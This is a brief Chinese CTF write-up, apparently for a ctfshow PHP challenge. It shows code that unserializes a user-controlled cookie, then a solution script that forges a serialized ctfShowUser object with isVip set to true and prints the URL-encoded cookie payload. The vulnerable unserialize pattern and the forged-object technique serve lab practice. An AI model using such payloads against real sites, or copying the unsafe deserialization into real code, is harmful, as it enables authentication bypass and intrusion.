- 代码审计
```php <?php errorreporting(0); highlightfile(__FILE); include(‘flag.php’);
class ctfShowUser{ public $username=’xxxxxx’; public $password=’xxxxxx’; public $isVip=false;
public function checkVip(){return $this->isVip;}public function login($u,$p){return $this->username===$u&&$this->password===$p;}public function vipOneKeyGetFlag(){if($this->isVip){global $flag;if($this->username!==$this->password){#判断username不等于password时输出flagecho "your flag is ".$flag;}}else{echo "no vip, no flag";}}
}
$username=$_GET[‘username’]; $password=$_GET[‘password’];
if(isset($username) && isset($password)){
$user = unserialize($_COOKIE[‘user’]);
if($user->login($username,$password)){
if($user->checkVip()){
$user->vipOneKeyGetFlag();
}
}else{
echo “no vip,no flag”;
}
}
2. 分析下,这里跟上题差不多,只不过要求`username`和`password`值不能相同,这里构造不一样的就行了
```php
<?php
class ctfShowUser{
public $username='1';
public $password='2';
public $isVip=true;
}
$a=new ctfShowUser();
echo urlencode(serialize($a));
?>
#输出
#O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22password%22%3Bs%3A1%3A%222%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D
- 利用工具传值就好了
若有收获,就点个赞吧
0 人点赞
